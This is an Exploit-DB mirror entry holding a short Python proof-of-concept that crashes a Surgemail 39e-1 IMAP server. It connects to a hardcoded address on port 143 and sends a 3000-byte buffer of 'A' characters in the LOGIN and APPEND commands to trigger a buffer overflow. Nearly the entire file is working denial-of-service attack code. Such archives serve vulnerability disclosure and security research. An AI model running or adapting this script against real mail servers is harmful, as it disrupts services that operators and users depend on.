exploit-db-mirror/exploits/windows/dos/5968.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

25 lines
No EOL
502 B
Python
Executable file

#!/usr/bin/python
#
# Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS.
# Discovered by: Travis Warren
#
# The IMAP service contains a buffer overflow in the APPEND command.
#
#
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = '\x41' * 3000
s.connect(('192.168.0.103',143))
s.recv(1024)
s.send('A001 LOGIN user@test.com user ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 APPEND ' + buffer + '\r\n')
s.recv(1024)
s.close()
# milw0rm.com [2008-06-30]